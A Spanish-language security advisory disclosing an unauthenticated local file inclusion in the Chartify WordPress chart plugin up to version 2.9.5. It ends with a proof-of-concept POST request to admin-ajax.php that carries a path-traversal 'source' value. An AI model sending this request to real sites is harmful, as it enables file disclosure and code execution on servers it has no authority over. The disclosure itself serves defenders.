
Chartify – Plugin de gráficos de WordPress <= 2.9.5 - Inclusión de archivos locales no autenticada a través de la fuente
Chartify – Plugin de gráficos para WordPress <= 2.9.5 - Inclusión de archivos locales no autenticada a través de source
El plugin Chartify – WordPress Chart Plugin para WordPress es vulnerable a Inclusión de Archivos Locales en todas las versiones hasta la 2.9.5 inclusive a través del parámetro 'source'. Esto permite que atacantes no autenticados incluyan y ejecuten archivos arbitrarios en el servidor, permitiendo la ejecución de cualquier código PHP en esos archivos. Esto puede utilizarse para eludir controles de acceso, obtener datos sensibles o lograr ejecución de código en casos donde se puedan subir e incluir imágenes y otros tipos de archivos "seguros".
POST /wp-admin/admin-ajax.php?action=add&source=../../../../../../../../../../../../var/www/html/poc&type=chart-js HTTP/1.1
Host: wp.local
Content-Length: 63
Content-Type: application/x-www-form-urlencoded
action=ays_chart_admin_ajax&function=display_plugin_charts_page